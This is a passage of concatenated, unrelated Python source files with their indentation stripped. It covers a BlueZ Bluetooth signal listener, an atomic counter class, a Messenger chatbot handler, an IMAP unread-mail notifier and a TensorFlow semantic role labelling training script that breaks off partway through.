bus = Gio.bus_get_sync(Gio.BusType.SYSTEM, None)
bus.call_sync(
"org.bluez",
"/org/bluez/hci0",
"org.bluez.Adapter1",
"StartDiscovery",
None,
None,
Gio.DBusCallFlags.NONE,
-1,
None,
)
conn = db.connect(user_data["db_path"])
for row in conn.execute("SELECT objPath FROM device"):
bus.signal_subscribe(
"org.bluez",
"org.freedesktop.DBus.Properties",
"PropertiesChanged",
row["objPath"],
None,
Gio.DBusSignalFlags.NONE,
callback,
user_data,
)
conn.close()
loop = GLib.MainLoop()
loop.run()
except GLib.Error:
error.log_no_context(
user_data["db_path"],
500,
"Bluetooth Error",
"Could not listen for Bluetooth events",
)
def callback(
connection,
sender_name,
object_path,
interface_name,
signal_name,
parameters,
user_data,
):
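# D-Bus signal handler: records RSSI updates and manufacturer (sensor) data for the reporting device.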
try:
for par in parameters:
if "RSSI" in par:
update_rssi(user_data["db_path"], object_path, par["RSSI"])
if "ManufacturerData" in par:
sensordata.insert(
user_data["db_path"],
object_path,
user_data["rate_limit"],
int(time()),
par["ManufacturerData"],
)
except Exception as e:
error.log_no_context(user_data["db_path"], 200, "Bluetooth Error", str(e))
|
AtomicCounter.py
|
"""An atomic, thread-safe incrementing counter."""
import threading
class AtomicCounter:
"""An atomic, thread-safe incrementing counter.
>>> counter = AtomicCounter()
>>> counter.increment()
1
>>> counter.increment(4)
5
>>> counter = AtomicCounter(42.5)
>>> counter.value
42.5
>>> counter.increment(0.5)
43.0
>>> counter = AtomicCounter()
>>> def incrementor():
... for i in range(100000):
... counter.increment()
>>> threads = []
>>> for i in range(4):
... thread = threading.Thread(target=incrementor)
... thread.start()
... threads.append(thread)
>>> for thread in threads:
... thread.join()
>>> counter.value
400000
"""
def __init__(self, initial=0):
"""Initialize a new atomic counter to given initial value (default 0)."""
self.value = initial
self._lock = threading.Lock()
def increment(self, num=1):
"""Atomically increment the counter by num (default 1) and return the
new value.
"""
with self._lock:
self.value += num
return self.value
def get_value(self):
with self._lock:
return self.value
if __name__ == '__main__':
import doctest
doctest.testmod()
|
handler.py
|
from threading import Thread
from sdk import *
from .queries.processor import process_text
import logging
from utils.text import restrict_len
from utils.mongo import Mongo
from utils.config import Config
import time
class Handler:
def __init__(self, config, facebook):
self.facebook = facebook
self.mongo = Mongo('users')
self.callback = None
self.languages = Config('languages.yml')
self.config = config
def set_lang(self, user_id, event):
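# Handle the user's reply to the language prompt and finish first-time setup.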
lang = event['message']['text'].lower().strip()
if lang not in self.languages.keys():
try:
self.check(user_id)
except BaseException:
return
else:
logging.getLogger('app').log(logging.INFO, 'SET language {} to user {}'.format(lang, user_id))
self.mongo.user_made_first_contact(user_id, True)
self.mongo.set_lang(user_id, lang)
self.send(user_id, self.get_phrase(user_id, 'lang_install_success'))
time.sleep(1)
self.callback = None
self.mongo.insert_user_ready(user_id, True)
self.mongo.set_awaiting(user_id, False)
self.send(user_id, self.get_phrase(user_id, 'send_location'))
def check(self, user_id):
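# Ask first-time users for their language; raises to abort processing of the current event.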
if self.mongo.is_user_first_contact(user_id):
self.send_waiting_response(user_id, 'What is your language? ({})'.format('/'.join(self.languages.keys())))
self.callback = self.set_lang
raise BaseException
def get_phrase(self, user_id, name):
return self.languages[self.mongo.get_user_lang(user_id)][name]
def process(self, event):
logging.getLogger('app').log(logging.INFO, 'Processing ' + str(event))
user_id = event['sender']['id']
if self.mongo.is_awaiting(user_id):
if 'message' in event and self.callback is not None:
self.callback(user_id, event)
return
try:
self.check(user_id)
except BaseException:
return
if not self.mongo.is_user_location_exists(user_id) and self.mongo.is_user_wants(
user_id) and not self.mongo.is_user_ready(user_id):
if not self.mongo.is_user_ready(user_id):
self.mongo.insert_user_ready(user_id, True)
self.send_waiting_response(user_id, self.get_phrase(user_id, 'send_location'))
return
if 'text' in event['message']:
data = event['message']['text']
data = process_text(data, self.config, {'user_id': user_id})
if type(data) is dict:
data['content'] = data['content'].split('\n\n')
elif 'attachments' in event['message']:
if len(event['message']['attachments']) > 1:
data = 'Only 1 attachment!'
else:
user_attachment = event['message']['attachments'][0]
if user_attachment['type'] == 'location':
if not self.mongo.is_user_location_exists(user_id) or self.mongo.is_user_ready(user_id):
self.mongo.insert_user_location(user_id, user_attachment['payload']['coordinates'])
logging.getLogger('app').log(logging.INFO,
'SET location {} to user {}'.format(
self.mongo.get_user_location(user_id), user_id)
)
data = self.get_phrase(user_id, 'location_updated')
else:
data = Attachment(
type='location',
payload=LocationPayload(user_attachment['payload']['coordinates'])
)
elif user_attachment['type'] == 'image':
data = Attachment(
type='image',
payload=ImagePayload(url=user_attachment['payload']['url'])
)
else:
data = process_text('sendsorryplease', self.config)
else:
data = process_text('sendsorryplease', self.config)
self.send(user_id, data)
def send_waiting_response(self, user_id, data):
self.send(user_id, data)
self.mongo.set_awaiting(user_id, True)
def send(self, user_id, data):
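# Dispatch text, attachments, or structured content to the user on background threads.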
to = user_id
def start_thread(inp):
args = []
if inp['type'] == 'image':
args.append(Message(Recipient(to),
Attachment(type='image', payload=ImagePayload(url=inp['content']))))
elif inp['type'] == 'text':
text = restrict_len(inp['content'])
args.append(Message(Recipient(to), text))
if 'url' in inp and inp['url'] is not None:
url = restrict_len(inp['url'])
args.append(Message(Recipient(to), url))
Thread(target=self.facebook.message, args=(args,)).start()
if type(data) is str:
Thread(target=self.facebook.message,
args=(
Message(Recipient(to), restrict_len((data[:data.rfind('\n')] if '\n' in data else data))),)
).start()
elif type(data) is Attachment:
Thread(target=self.facebook.message,
args=(Message(Recipient(to), data),)).start()
elif type(data) is list:
for item_data in data:
if type(item_data) is str:
self.send(user_id, item_data)
elif type(item_data) is dict:
item_data['content'] = item_data['content'].split('\n\n')
self.send(user_id, item_data)
time.sleep(0.2)
elif type(data) is dict:
if type(data['content']) is list:
for content_data in data['content']:
dic = data
dic['content'] = content_data
start_thread(dic)
time.sleep(0.2)
|
imapclient.py
|
#!/usr/bin/env python3
# Standard libraries.
import asyncio
import collections.abc
import datetime
import enum
import imaplib
import logging
import pathlib
import select
import socket
import typing
# External dependencies.
import imapclient
import keyring
# Internal modules.
import phile.asyncio.pubsub
import phile.configuration
import phile.imapclient
import phile.notify
# TODO[mypy issue #1422]: __loader__ not defined
_loader_name: str = __loader__.name # type: ignore[name-defined]
_logger = logging.getLogger(_loader_name)
"""Logger whose name is the module name."""
class UnseenNotifier(phile.imapclient.FlagTracker):
"""Create a notification to indicate unread emails."""
def __init__(
self, *args: typing.Any, notify_path: pathlib.Path,
**kwargs: typing.Any
):
self._notify_path = notify_path
_logger.info("Using notification path: %s", self._notify_path)
super().__init__(*args, **kwargs)
# Ensure any existing notification file is cleared
# if there are no new messages.
self.update_notify_file()
def select(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().select(*args, **kwargs)
self.update_notify_file()
def add(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().add(*args, **kwargs)
self.update_notify_file()
def update_notify_file(self) -> None:
message_counts = self.message_counts
unknown_count = message_counts['unknown']
unseen_count = message_counts['unseen']
_logger.debug("Message status: %s", message_counts)
if unknown_count or unseen_count:
_logger.debug("Creating notification file.")
self._notify_path.write_text(
"There are {} + {} unseen messages.".format(
unseen_count, unknown_count
)
)
else:
try:
_logger.debug("Removing notification file.")
self._notify_path.unlink()
except FileNotFoundError:
_logger.debug("Notification file not found. Ignoring.")
class MissingCredential(Exception):
pass
async def load_configuration(
configuration: phile.configuration.Entries,
keyring_backend: keyring.backend.KeyringBackend,
) -> phile.configuration.ImapEntries:
imap_configuration = configuration.imap
if imap_configuration is None:
raise MissingCredential(
'Unable to find imap credentials in configuration'
)
imap_configuration = imap_configuration.copy()
del configuration
if imap_configuration.password is not None:
if imap_configuration.username is None:
raise MissingCredential('Unable to find imap username.')
else:
credential = await asyncio.to_thread(
keyring_backend.get_credential,
'imap',
imap_configuration.username,
)
if credential is None:
raise MissingCredential('Unable to load imap password.')
imap_configuration.password = credential.password
imap_configuration.username = credential.username
return imap_configuration
def create_client(
imap_configuration: phile.configuration.ImapEntries,
) -> tuple[imapclient.IMAPClient, phile.imapclient.SelectResponse]:
assert imap_configuration.username is not None
assert imap_configuration.password is not None
_logger.info('Connecting to %s', imap_configuration.host)
imap_client = imapclient.IMAPClient(
host=imap_configuration.host,
timeout=imap_configuration.connect_timeout.total_seconds(),
)
_logger.info('Logging in to %s', imap_configuration.username)
response = imap_client.login(
imap_configuration.username,
imap_configuration.password,
)
_logger.debug('Login response: %s', response.decode())
_logger.info('Selecting folder: %s', imap_configuration.folder)
select_response = imap_client.select_folder(
imap_configuration.folder
)
return imap_client, select_response
def idle(
imap_client: imapclient.IMAPClient,
stop_socket: socket.socket,
refresh_timeout: datetime.timedelta,
) -> collections.abc.Iterator[list[phile.imapclient.ResponseLine]]:
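# Generator: repeatedly enter IMAP IDLE and yield server response lines until stopped or the connection drops.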
_logger.debug("Starting IDLE wait loop.")
imap_socket = phile.imapclient.get_socket(imap_client)
while True:
refresh_time = datetime.datetime.now() + refresh_timeout
assert not phile.imapclient.is_idle(imap_client)
_logger.debug("Entering IDLE state.")
imap_client.idle()
try:
rlist = [imap_socket]
while rlist:
timeout = refresh_time - datetime.datetime.now()
rlist, wlist, xlist = select.select(
[imap_socket, stop_socket],
[],
[],
max(timeout.total_seconds(), 0),
)
del timeout
del wlist
del xlist
if imap_socket in rlist:
idle_response = imap_client.idle_check(timeout=0)
_logger.debug("IDLE response: %s", idle_response)
# If no data is returned, the connection is closed.
# Try to stop. idle_done will likely error.
if not idle_response:
return
yield idle_response
del idle_response
if stop_socket in rlist:
return
finally:
_logger.debug("Exiting IDLE state.")
done_response = imap_client.idle_done()
_logger.debug("IDLE done response: %s", done_response)
yield done_response[1]
del done_response
class EventType(enum.IntEnum):
ADD = enum.auto()
SELECT = enum.auto()
class Event(typing.TypedDict, total=False):
type: EventType
add_response: list[phile.imapclient.ResponseLine]
select_response: phile.imapclient.SelectResponse
def read_from_server(
*,
imap_configuration: phile.configuration.ImapEntries,
stop_socket: socket.socket,
) -> collections.abc.Iterator[Event]:
idle_refresh_timeout = imap_configuration.idle_refresh_timeout
maximum_reconnect_delay = imap_configuration.maximum_reconnect_delay
minimum_reconnect_delay = imap_configuration.minimum_reconnect_delay
# First connect does not need a delay.
reconnect_delay = datetime.timedelta(seconds=0)
while True:
# Reset the database before waiting.
yield Event(
type=EventType.SELECT,
select_response={
b"EXISTS": 0,
b"FLAGS": tuple(),
b"RECENT": 0,
},
)
_logger.info("Connecting in %s.", reconnect_delay)
rlist, wlist, xlist = select.select([
stop_socket
], [], [], reconnect_delay.total_seconds())
if rlist:
_logger.info("Received stop request. Not connecting.")
break
del rlist
del wlist
del xlist
_logger.debug("Creating an IMAP client to connect with.")
imap_client, select_response = create_client(
imap_configuration=imap_configuration,
)
try:
yield Event(
type=EventType.SELECT,
select_response=select_response,
)
del select_response
# Now that the connection has been successful,
# reset the reconnection delay.
reconnect_delay = datetime.timedelta(seconds=0)
for response_lines in idle(
imap_client=imap_client,
refresh_timeout=idle_refresh_timeout,
stop_socket=stop_socket,
):
yield Event(
type=EventType.ADD,
add_response=response_lines,
)
# Connection and socket errors are subclasses of `OSError`.
# There are no finer grain parent class
# that catches all socket errors.
# Listing all socket errors individually is not a good idea,
# so a blanket catch of `OSError` is done here instead.
except (
imaplib.IMAP4.abort, imaplib.IMAP4.error, OSError
) as error:
_logger.info(error)
# Double the delay.
reconnect_delay *= 2
reconnect_delay = max(
reconnect_delay, minimum_reconnect_delay
)
reconnect_delay = min(
reconnect_delay, maximum_reconnect_delay
)
finally:
# Always logout before returning to try to clean up
# on a best effort basis.
_logger.debug("Logging out from IMAP client.")
try:
imap_client.logout()
# Some servers immediately close the socket
# when it receives a `BYE` request.
# This means attempting to close the socket
# would raise an exception.
# Since a disconnection is the goal here anyway,
# catch the exception and continue.
except (imaplib.IMAP4.error, OSError):
_logger.info("IMAP socket was not closed properly.")
async def run(
configuration: phile.configuration.Entries,
keyring_backend: keyring.backend.KeyringBackend,
) -> None:
event_queue = phile.asyncio.pubsub.Queue[Event]()
imap_configuration = await load_configuration(
configuration=configuration,
keyring_backend=keyring_backend,
)
loop = asyncio.get_running_loop()
stop_reader, stop_writer = await loop.run_in_executor(
None, socket.socketpair
)
try:
def handle_event() -> None:
try:
for event in read_from_server(
imap_configuration=imap_configuration,
stop_socket=stop_reader,
):
loop.call_soon_threadsafe(event_queue.put, event)
finally:
loop.call_soon_threadsafe(event_queue.put_done)
worker_thread = phile.asyncio.Thread(target=handle_event)
notify_directory = (
configuration.state_directory_path /
configuration.notify_directory
)
notify_directory.mkdir(parents=True, exist_ok=True)
imap_response_handler = UnseenNotifier(
notify_path=(notify_directory / "20-imap-idle.notify")
)
del notify_directory
event_reader = event_queue.__aiter__()
worker_thread.start()
try:
# A branching path going from `async for` to `finally`
# is reported as missing by `coverage.py`.
# But it should be covered by one of the tests already.
# Specifically, propagation of connection error.
# So ignoring this branch report for now,
async for event in event_reader: # pragma: no branch
event_type = event['type']
if event_type == EventType.ADD:
await loop.run_in_executor(
None,
imap_response_handler.add,
event['add_response'],
)
elif event_type == EventType.SELECT:
await loop.run_in_executor(
None,
imap_response_handler.select,
event['select_response'],
)
else: # pragma: no cover # Defensive.
assert False, 'Unreachable.'
finally:
_logger.info("Sending stop request. To not connect.")
stop_writer.sendall(b'\0')
await worker_thread.async_join()
finally:
try:
stop_reader.close()
finally:
stop_writer.close()
|
main.py
|
# main.py
# author: Playinf
# email: playinf@stu.xmu.edu.cn
import os
import ops
import sys, pdb
import copy
import argparse
import numpy as np
import tensorflow as tf
import multiprocessing
from utils import parallel_model
from utils.validation import validate
from data.record_reader import get_input_fn
from data.plain_text import load_vocab, load_glove_embedding
from data.plain_text import get_sorted_input_fn, convert_text
from ops.initializer import variance_scaling_initializer
from models.tagger import get_tagger_model, get_model_params
from metrics import create_tagger_evaluation_metrics
def parseargs_train(args):
msg = "training SRL models"
usage = "main.py train [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--model_dir", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs=2, help=msg)
msg = "pre-trained embedding file"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "training parameters"
parser.add_argument("--training_params", default="", type=str, help=msg)
msg = "validation params"
parser.add_argument("--validation_params", default="", type=str, help=msg)
msg = "decoding parameters"
parser.add_argument("--decoding_params", default="", type=str, help=msg)
return parser.parse_args(args)
def parseargs_predict(args):
msg = "predict using existing SRL models"
usage = "main.py predict [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--model_dir", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "name of output file"
parser.add_argument("--output_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs=2, help=msg)
msg = "pretrained embedding path"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "decoding parameters"
parser.add_argument("--decoding_params", default="", type=str, help=msg)
msg = "use viterbi decoding"
parser.add_argument("--viterbi", action="store_true", help=msg)
msg = "enable verbose message"
parser.add_argument("--verbose", action="store_true", help=msg)
msg = "decoding device"
parser.add_argument("--device_list", nargs="+", type=int, help=msg)
return parser.parse_args(args)
def parseargs_ensemble(args):
msg = "ensemble using existing SRL models"
usage = "main.py ensemble [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--checkpoints", nargs="+", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "name of output file"
parser.add_argument("--output_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs="+", help=msg)
msg = "pretrained embedding path"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "decoding parameters"
parser.add_argument("--decoding_params", default="", type=str, help=msg)
msg = "use viterbi decoding"
parser.add_argument("--viterbi", action="store_true", help=msg)
msg = "enable verbose message"
parser.add_argument("--verbose", action="store_true", help=msg)
msg = "decoding device"
parser.add_argument("--device_list", nargs="+", type=int, help=msg)
return parser.parse_args(args)
def parseargs_visualize(args):
msg = "Visualize attention weights using existing SRL models"
usage = "main.py visualize [<args>] [-h | --help]"
parser = argparse.ArgumentParser(description=msg, usage=usage)
msg = "path or pattern of input data"
parser.add_argument("--data_path", type=str, help=msg)
msg = "directory to save models"
parser.add_argument("--model_dir", type=str, help=msg)
msg = "name of model"
parser.add_argument("--model_name", type=str, help=msg)
msg = "name of output html file"
parser.add_argument("--output_name", type=str, help=msg)
msg = "path to token and label vocabulary"
parser.add_argument("--vocab_path", type=str, nargs=2, help=msg)
msg = "pretrained embedding path"
parser.add_argument("--emb_path", type=str, help=msg)
msg = "model parameters, see tf.contrib.training.parse_values for details"
parser.add_argument("--model_params", default="", type=str, help=msg)
msg = "enable verbose message"
parser.add_argument("--verbose", action="store_true", help=msg)
msg = "decoding device"
parser.add_argument("--device_list", nargs="+", type=int, help=msg)
return parser.parse_args(args)
def get_vocabulary(vocab_path):
tok_voc = load_vocab(vocab_path[0])
lab_voc = load_vocab(vocab_path[1])
vocabulary = {"inputs": tok_voc, "targets": lab_voc}
return vocabulary
def get_ensemble_vocabulary(vocab_path):
vocs = [load_vocab(item) for item in vocab_path]
voc_list = []
tok_voc = vocs[:-1]
lab_voc = vocs[-1]
for item in tok_voc:
vocab = {"inputs": item, "targets": lab_voc}
voc_list.append(vocab)
return voc_list
def training_params():
params = tf.contrib.training.HParams(
optimizer="Adam",
learning_rate=1.0,
max_learning_rate=5e-4,
adam_beta1=0.9,
adam_beta2=0.98,
adam_epsilon=1e-9,
adadelta_rho=0.95,
adadelta_epsilon=1e-6,
initializer_gain=1.0,
clip_grad_norm=0.0,
batch_size=4096,
eval_batch_size=4096,
max_length=256,
mantissa_bits=2,
warmup_steps=4000,
train_steps=250000,
eval_steps=10,
min_eval_frequency=2000,
keep_checkpoint_max=20,
batching_scheme="token",
learning_rate_decay="noam",
learning_rate_boundaries=[0],
learning_rate_values=[0.0],
initializer="uniform_unit_scaling",
device_list=[0],
allow_growth=True,
use_global_initializer=True
)
return params
def validation_params():
params = tf.contrib.training.HParams(
script="",
frequency=300,
keep_top_k=5
)
return params
def decoding_params():
params = tf.contrib.training.HParams(
decode_batch_size=128,
)
return params
def merge_params(p1, p2):
# pdb.set_trace()
params = tf.contrib.training.HParams()
v1 = p1.values()
v2 = p2.values()
for (k, v) in v1.items():
params.add_hparam(k, v)
for (k, v) in v2.items():
params.add_hparam(k, v)
return params
def get_params(args):
params = tf.contrib.training.HParams(
data_path=args.data_path,
model_dir=args.model_dir,
model_name=args.model_name,
vocab_path=args.vocab_path,
model_params=args.model_params,
training_params=args.training_params
)
tparams = training_params()
tparams.parse(args.training_params)
params = merge_params(params, tparams)
mparams = get_model_params(args.model_name)
mparams.parse(args.model_params)
params = merge_params(params, mparams)
vparams = validation_params()
vparams.parse(args.validation_params)
params = merge_params(params, vparams)
dparams = decoding_params()
dparams.parse(args.decoding_params)
params = merge_params(params, dparams)
return params
def print_params(params):
for (k, v) in params.values().items():
print("%s: %s" % (k, v))
def orthogonal_initializer(gain=1.0, seed=None, dtype=tf.float32):
oinit = tf.orthogonal_initializer(gain, seed, dtype)
def initializer(shape, dtype=dtype, partition_info=None):
if len(shape) == 1:
result = oinit(list(shape) + [1], dtype, partition_info)
return tf.squeeze(result, 1)
return oinit(shape, dtype, partition_info)
return initializer
def get_transition_params(label_strs):
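# Forbid I-X following B-Y or I-Y with a different label (BIO constraint) by assigning -inf transition scores.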
num_tags = len(label_strs)
transition_params = np.zeros([num_tags, num_tags], dtype=np.float32)
for i, prev_label in enumerate(label_strs):
for j, label in enumerate(label_strs):
if prev_label[0] == "B" and label[0] == "I":
if prev_label[1:] != label[1:]:
transition_params[i, j] = np.NINF
if prev_label[0] == "I" and label[0] == "I":
if prev_label[1:] != label[1:]:
transition_params[i, j] = np.NINF
return transition_params
def get_initializer(params):
if params.initializer == "orthogonal":
return orthogonal_initializer(gain=params.initializer_gain)
elif params.initializer == "uniform":
max_val = params.initializer_gain
return tf.random_uniform_initializer(-max_val, max_val)
elif params.initializer == "normal":
return tf.random_normal_initializer(0.0, params.initializer_gain)
elif params.initializer == "normal_unit_scaling":
return variance_scaling_initializer(params.initializer_gain,
mode="fan_avg",
distribution="normal")
elif params.initializer == "uniform_unit_scaling":
return variance_scaling_initializer(params.initializer_gain,
mode="fan_avg",
distribution="uniform")
else:
raise ValueError("Unrecognized initializer: %s" % params.initializer)
def get_learning_rate_decay(learning_rate, global_step, params):
if params.learning_rate_decay == "noam":
return ops.train.noam_decay(learning_rate, global_step,
params.warmup_steps,
params.hidden_size ** -0.5)
elif params.learning_rate_decay == "piecewise_constant":
return tf.train.piecewise_constant(tf.to_int32(global_step),
params.learning_rate_boundaries,
params.learning_rate_values)
elif params.learning_rate_decay == "none":
return learning_rate
else:
raise ValueError("Unknown learning_rate_decay")
def set_variables(var_list, value_dict, prefix):
sess = tf.get_default_session()
for var in var_list:
for name in value_dict:
var_name = "/".join([prefix] + list(name.split("/")[1:]))
if var.name[:-2] == var_name:
print("restoring %s -> %s" % (name, var.name))
with tf.device("/cpu:0"):
op = tf.assign(var, value_dict[name])
sess.run(op)
break
def srl_model(features, labels, mode, params):
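# Estimator model_fn: build the tagger graph and the losses/predictions for TRAIN, EVAL, or INFER mode.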
if mode == tf.contrib.learn.ModeKeys.TRAIN:
initializer = get_initializer(params)
tf.get_variable_scope().set_initializer(initializer)
model_fn = get_tagger_model(params.model_name, mode)
features["targets"] = labels
with tf.variable_scope("tagger"):
loss = parallel_model(model_fn, features, params, mode)
with tf.variable_scope("losses_avg"):
loss_moving_avg = tf.get_variable("training_loss",
initializer=100.0,
trainable=False)
lm = loss_moving_avg.assign(loss_moving_avg * 0.9 + loss * 0.1)
tf.summary.scalar("loss_avg/total_loss", lm)
with tf.control_dependencies([lm]):
loss = tf.identity(loss)
global_step = tf.train.get_or_create_global_step()
lr = get_learning_rate_decay(params.learning_rate, global_step, params)
# create optimizer
if params.optimizer == "Adam":
opt = tf.train.AdamOptimizer(lr, beta1=params.adam_beta1,
beta2=params.adam_beta2,
epsilon=params.adam_epsilon)
elif params.optimizer == "Adadelta":
opt = tf.train.AdadeltaOptimizer(lr, rho=params.adadelta_rho,
epsilon=params.adadelta_epsilon)
elif params.optimizer == "SGD":
opt = tf.train.GradientDescentOptimizer(lr)
elif params.optimizer == "Nadam":
opt = tf.contrib.opt.NadamOptimizer(lr, beta1=params.adam_beta1,
beta2=params.adam_beta2,
epsilon=params.adam_epsilon)
else:
raise ValueError("Unknown optimizer %s" % params.optimizer)
global_step = tf.train.get_global_step()
tf.summary.scalar("learning_rate", lr)
log_hook = tf.train.LoggingTensorHook(
{
"step": global_step,
"loss": loss,
"inputs": tf.shape(features["inputs"]),
"labels": tf.shape(labels)
},
every_n_iter=1,
)
all_weights = {v.name: v for v in tf.trainable_variables()}
total_size = 0
for v_name in sorted(list(all_weights)):
v = all_weights[v_name]
tf.logging.info("%s\tshape %s", v.name[:-2].ljust(80),
str(v.shape).ljust(20))
v_size = int(np.prod(np.array(v.shape.as_list())))
total_size += v_size
tf.logging.info("Total trainable variables size: %d", total_size)
train_op = tf.contrib.layers.optimize_loss(
name="training",
loss=loss,
global_step=global_step,
learning_rate=lr,
clip_gradients=params.clip_grad_norm or None,
optimizer=opt,
colocate_gradients_with_ops=True
)
training_chief_hooks = [log_hook]
predictions = None
elif mode == tf.contrib.learn.ModeKeys.EVAL:
model_fn = get_tagger_model(params.model_name, mode)
features["targets"] = labels
with tf.variable_scope("tagger"):
loss, logits = model_fn(features, params)
predictions = {"predictions": logits}
train_op = None
training_chief_hooks = None
elif mode == tf.contrib.learn.ModeKeys.INFER:
model_fn = get_tagger_model(params.model_name, mode)
features["targets"] = labels
with tf.variable_scope("tagger"):
outputs, probs = model_fn(features, params)
predictions = {
"inputs": features["inputs"],
"outputs": outputs,
"distribution": probs
}
loss = None
train_op = None
training_chief_hooks = None
else:
raise ValueError("Unknown mode %s" % mode)
spec = tf.contrib.learn.ModelFnOps(
mode=mode, loss=loss, train_op=train_op,
training_chief_hooks=training_chief_hooks,
predictions=predictions
)
return spec
def session_config(params):
optimizer_options = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L1,
do_function_inlining=False)
graph_options = tf.GraphOptions(optimizer_options=optimizer_options)
config = tf.ConfigProto(allow_soft_placement=True,
graph_options=graph_options)
if params.device_list:
device_str = ",".join([str(i) for i in params.device_list])
config.gpu_options.visible_device_list = device_str
if params.allow_growth:
config.gpu_options.allow_growth = True
return config
def train(args):
tf.logging.set_verbosity(tf.logging.INFO)
params = get_params(args)
vocabulary = get_vocabulary(params.vocab_path)
params.add_hparam("vocabulary", vocabulary)
if args.emb_path:
if "glove" in args.emb_path:
emb = load_glove_embedding(args.emb_path,
params.vocabulary["inputs"])
else:
emb = np.loadtxt(args.emb_path).astype("float32")
else:
emb = None
params.add_hparam("embedding", emb)
config = tf.contrib.learn.RunConfig(
model_dir=params.model_dir,
session_config=session_config(params),
keep_checkpoint_max=params.keep_checkpoint_max,
save_checkpoints_secs=300
)
# model_fn: (features, labels, mode, params, config) => EstimatorSpec
# input_fn: () => (features, labels)
# create estimator
estimator = tf.contrib.learn.Estimator(
model_fn=srl_model,
model_dir=params.model_dir,
config=config,
params=params
)
# create input_fn
train_input_fn = get_input_fn(
params.data_path + "*train*",
tf.contrib.learn.ModeKeys.TRAIN,
params
)
if tf.gfile.Glob(params.data_path + "*dev*"):
eval_input_fn = get_input_fn(
params.data_path + "*dev*", tf.contrib.learn.ModeKeys.EVAL, params
)
else:
eval_input_fn = None
# create experiment
experiment = tf.contrib.learn.Experiment(
estimator=estimator,
eval_metrics=create_tagger_evaluation_metrics(),
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
train_steps=params.train_steps,
eval_steps=params.eval_steps,
min_eval_frequency=params.min_eval_frequency
)
if params.script:
process = multiprocessing.Process(target=validate, args=[params])
process.daemon = True
process.start()
else:
process = None
# start training
try:
if eval_input_fn:
experiment.train_and_evaluate()
else:
experiment.train()
finally:
if process is not None:
process.terminate()
def predict(args):
tf.logging.set_verbosity(tf.logging.INFO)
params = tf.contrib.training.HParams(
data_path=args.data_path,
model_dir=args.model_dir,
model_name=args.model_name,
vocab_path=args.vocab_path,
model_params=args.model_params,
device_list=args.device_list or [0],
allow_growth=True
)
mparams = get_model_params(args.model_name)
params = merge_params(params, mparams)
params.parse(args.model_params)
dparams = decoding_params()
params = merge_params(params, dparams)
params.parse(args.decoding_params)
vocabulary = get_vocabulary(params.vocab_path)
params.add_hparam("vocabulary", vocabulary)
if args.emb_path:
if "glove" in args.emb_path:
emb = load_glove_embedding(args.emb_path, None)
else:
emb = np.loadtxt(args.emb_path).astype("float32")
else:
emb = None
params.add_hparam("embedding", emb)
config = tf.contrib.learn.RunConfig(
model_dir=params.model_dir,
session_config=session_config(params),
)
# create estimator
estimator = tf.contrib.learn.Estimator(
model_fn=srl_model,
model_dir=params.model_dir,
config=config,
params=params
)
decodes = []
sorted_inputs, sorted_keys, num_batches, input_fn = get_sorted_input_fn(
params.data_path,
params.vocabulary["inputs"],
params.decode_batch_size * len(params.device_list),
params
)
ivocab = {"inputs": {}, "targets": {}}
labels = []
for k, idx in vocabulary["inputs"].items():
ivocab["inputs"][idx] = k
for k, idx in vocabulary["targets"].items():
ivocab["targets"][idx] = k
for idx in range(len(ivocab["targets"])):
labels.append(ivocab["targets"][idx])
tparams = get_transition_params(labels)
for i in range(num_batches):
result_iter = estimator.predict(input_fn=input_fn.next,
as_iterable=True)
for result in result_iter:
inputs = result["inputs"]
outputs = result["outputs"]
dist = result["distribution"]
input_text = []
output_text = []
index = 0
if args.viterbi:
seq_len = 0
while index < len(inputs) and inputs[index] != 0:
seq_len += 1
index += 1
dist = dist[:seq_len, :]
outputs, _ = tf.contrib.crf.viterbi_decode(dist, tparams)
index = 0
while index < len(inputs) and inputs[index] != 0:
input_text.append(ivocab["inputs"][inputs[index]])
output_text.append(ivocab["targets"][outputs[index]])
index += 1
# decode to plain text
input_text = " ".join(input_text)
output_text = " ".join(output_text)
if args.verbose:
sys.stdout.write("INPUT: %s\n" % input_text)
sys.stdout.write("OUTPUT: %s\n" % output_text)
decodes.append(output_text)
sorted_inputs.reverse()
decodes.reverse()
outputs = []
for index in range(len(sorted_inputs)):
outputs.append(decodes[sorted_keys[index]])
if not args.output_name:
base_filename = os.path.basename(params.data_path)
decode_filename = base_filename + "." + params.model_name + ".decodes"
else:
decode_filename = args.output_name
outfile = tf.gfile.Open(decode_filename, "w")
for output in outputs:
outfile.write("%s\n" % output)
outfile.close()
def ensemble(args):
if len(args.vocab_path) != len(args.checkpoints) + 1:
raise ValueError("Unmatched vocabulary number and checkpoint number")
# override parameters
params = tf.contrib.training.HParams(
data_path=args.data_path,
model_name=args.model_name,
vocab_path=args.vocab_path,
model_params=args.model_params,
device_list=args.device_list or [0],
allow_growth=True
)
